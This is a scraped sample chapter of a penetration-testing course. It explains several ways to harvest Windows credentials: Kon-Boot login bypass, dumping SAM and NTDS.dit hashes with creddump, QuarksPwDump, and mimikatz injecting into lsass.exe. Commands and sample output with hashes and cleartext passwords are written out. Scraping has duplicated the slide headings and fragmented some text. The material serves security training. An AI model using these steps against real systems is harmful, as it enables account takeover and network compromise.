WARNING Sample chapter Materials in this sample chapter

  • Slides: 20
Download presentation

WARNING! Sample chapter - Materials in this sample chapter is selected advanced penetration from

WARNING! Sample chapter - Materials in this sample chapter is selected advanced penetration from https: //training. zdresearch. com - We hope you enjoy it !

Obtaining Windows Passwords - Now you know about pass the hash and how windows

Obtaining Windows Passwords - Now you know about pass the hash and how windows hashing works lets look at some attack scenario - Let’s assume that we are within a network that using domain controller for managing resources and users.

Obtaining Windows Passwords - For your remember let’s take a quick look at how

Obtaining Windows Passwords - For your remember let’s take a quick look at how Active directory works again

Obtaining Windows Passwords - Ok now let’s go for scenarios that we can use

Obtaining Windows Passwords - Ok now let’s go for scenarios that we can use to obtain NT and LM hashes for doing pass the hash attacks. 1 - Physical attack and password bypass 2 - Dumping NT and LM hashes using SAM database 3 - Dumping Windows passwords from password history 4 - Dumping passwords and hashes from logon sessions 5 - Dumping hashed password from Domain Controller

Physical attack and password bypass • In first scenario we have physical access to

Physical attack and password bypass • In first scenario we have physical access to the system so how we can login into password protected system ? • the answer is very easy windows do not offer any protection for physical access attacks • You can use any live disk to modify SAM database in /system 32/config • You can boot using both USB and CD • But there is problem in this method the user will informed it when you modified her/his password or added totally new user • So what is solution now ?

Physical attack and password bypass • • Using Kon-Boot to win You can buy

Physical attack and password bypass • • Using Kon-Boot to win You can buy it for 15$ http: //www. piotrbania. com/all/kon-boot/ Kon-Boot will doing temporary patch on kernel So you can login with any user without the pass Do your jobs and restart the system The original password will still work So you did full stealth attack !

Dumping NT and LM hashes using SAM database • Second scenario is using •

Dumping NT and LM hashes using SAM database • Second scenario is using • You need copy of protected SAM file and by default not possible • Using hobocopy or Fast RAW file copier make it possible C: hobo copyx 64>Hobo. Copy. exe c: WindowsSystem 32config c: config-bkp 44 files (136. 92 MB, 1 directories) copied, 0 files skipped

Dumping NT and LM hashes using SAM database • Now you can use creddump

Dumping NT and LM hashes using SAM database • Now you can use creddump in your BT/Kali to extract hashes • You need copy of protected SAM file and by default not possible • Using hobocopy or Fast RAW file copier make it possible root@bt: /pentest/passwords/creddump#. /pwdump. py /root/SYSTEM /root/SAM Administrator: 500: 1 d 9321 d 6 da 8213 bdc 4482861 fc 3 ea 9 db: 80290 fc 9 b 3 c 2 b 233769 aa 9 d 6 ced 8 bc 86: : : • you can see the SYSTEM file here this file is called system hive and syskey too and used for offering more securing password mechanism

Dumping Windows passwords from password history • In the networks with more than 10

Dumping Windows passwords from password history • In the networks with more than 10 user maybe you are out of luck if you look at SAM file • But refer to how DC is configured we may can use some situation to find attacks on host machine • One of main situations here is using Password history feature

Dumping Windows passwords from password history • This policy will not let user use

Dumping Windows passwords from password history • This policy will not let user use same password they used in X period • For example if your password was 12345 your next password after expire can’t be same as 12345 • A very cool tool called Quarckspw. Dump can help you to dump hashes in these situations C: >Quarks. Pw. Dump. exe -dhl –hist Administrator: 500: 44 EFCE 164 AB 921 CAAAD 3 B 435 B 51404 EE: 32 ED 87 BDB 5 FDC 5 E 9 CBA 88547376818 D 4: : : Administrator_hist 0: 500: 44 EFCE 164 AB 921 CAAAD 3 B 435 B 51404 EE: 32 ED 87 BDB 5 FDC 5 E 9 CBA 88547376818 D 4: : : Administrator_hist 1: 500: AEBD 4 DE 384 C 7 EC 43 AAD 3 B 435 B 51404 EE: 7 A 21990 FCD 3 D 759941 E 45 C 490 F 143 D 5 F: : : Administrator_hist 2: 500: B 757 BF 5 C 0 D 87772 FAAD 3 B 435 B 51404 EE: 7 CE 21 F 17 C 0 AEE 7 FB 9 CEBA 532 D 0546 AD 6: : :

Dumping passwords and hashes from logon sessions • We are still not down !

Dumping passwords and hashes from logon sessions • We are still not down ! We have a more very cool methods to obtaining windows passwords • Windows will keep every single success login in memory and call this logon session • The info in memory includes username , workgroup and NT: LM hashed password • And this memory storage is not only about GUI login it can be happen from : • RDP login • Using Run. AS feature • Using every API call that needs login like Create. Process. With. Logon • Etc.

Dumping passwords and hashes from logon sessions For extracting logon session as you know

Dumping passwords and hashes from logon sessions For extracting logon session as you know you need privileged user For this task we will use french tool called mimikatz http: //blog. gentilkiwi. com This tool will extract passwords by injection a DLL called securlsa. dll into lsass. exe process • You can follow next slide method to dump windows passwords in clear text ! • Please note you should write every command after # sign. • •

Dumping passwords and hashes from logon sessions mimikatz # privilege: : debug Demande d'ACTIVATION

Dumping passwords and hashes from logon sessions mimikatz # privilege: : debug Demande d'ACTIVATION du privilège : Se. Debug. Privilege : OK mimikatz # inject: : process lsass. exe sekurlsa. dll PROCESSENTRY 32(lsass. exe). th 32 Process. ID = 432 … mimikatz # @get. Logon. Passwords full Authentification Id : 0; 470133 Package d'authentification : NTLM Utilisateur principal : Administrator Domaine d'authentification : Sensetive-man msv 1_0 : * Utilisateur : Administrator * Domaine : Sensetive-man * Hash LM : 44 efce 164 ab 921 caaad 3 b 435 b 51404 ee * Hash NTLM : 32 ed 87 bdb 5 fdc 5 e 9 cba 88547376818 d 4 wdigest : * Utilisateur : Administrator * Domaine : Sensetive-man * Mot de passe : 123456 tspkg : * Utilisateur : Administrator * Domaine : Sensetive-man * Mot de passe : 123456 kerberos : * Utilisateur : Administrator * Domaine : Sensetive-man * Mot de passe : 123456 mimikatz #

Dumping passwords and hashes from logon sessions • Ok so we can clear-text password

Dumping passwords and hashes from logon sessions • Ok so we can clear-text password why ? • In Windows after Vista there is new (SSP) Security Support Provider for RDP shortly called Tspkg. This feature will add single sing-on (remember me !) to this protocol. • And in almost all Windows we have another feature called WDigest and this is another SSP implementation for authentication and due to logical flow in it, for responding to challenges it will keep clear-text version of password in memory.

Dumping passwords and hashes from logon sessions • Using Kerberos protocol or msv 1_0

Dumping passwords and hashes from logon sessions • Using Kerberos protocol or msv 1_0 authentication that used by lsass for connecting to domains, will force the windows to keep passwords in clear-text. • In following figure you can see SSP settings for windows 7 machine.

Dumping hashed password from Domain Controller • Ok we are at last method in

Dumping hashed password from Domain Controller • Ok we are at last method in our dumping windows password journey • To now you should can understand it easily you can find your DC manager password from your host memory. • So you will connect to your DC using RDP and will look at the SAM file and all you will get is the users for DC machine not all users domain users. • For getting all users password you should head on to windowsNTDS

Dumping hashed password from Domain Controller • For accomplishing this task we need two

Dumping hashed password from Domain Controller • For accomplishing this task we need two tool one is called libesedb and our previously used creddump • http: //sourceforge. net/projects/libesedb/ • http: //code. google. com/p/creddump/ • So you can have to compile libesedb and put your hash table you got from NTDS in NTDS. export directory #cd libesedb #chmod +x configure #. /configure && make -- Now extract the hash table from ntds. dit and put it in NTDS. export directory in same program directory #cd esedbtools #. /esedbdumphash. . /ntds. dit Now you can use creddump to dump passwrds remember you need SYSTEM file root@bt: ~/creddump# python dsdump. py. . /SYSTEM. . /NTDS. export/datatable Administrator: 500: NO PASSWORD***********: 031 F 8 E 5 A 76932 FC 5 CC 7431680 ADAE 4 EC: : :

End of sample • Using these simple tools and tricks you can successfully completely

End of sample • Using these simple tools and tricks you can successfully completely compromise a lot of windows network during your penetration tests. I hope you enjoyed the sample and see you in full course !!!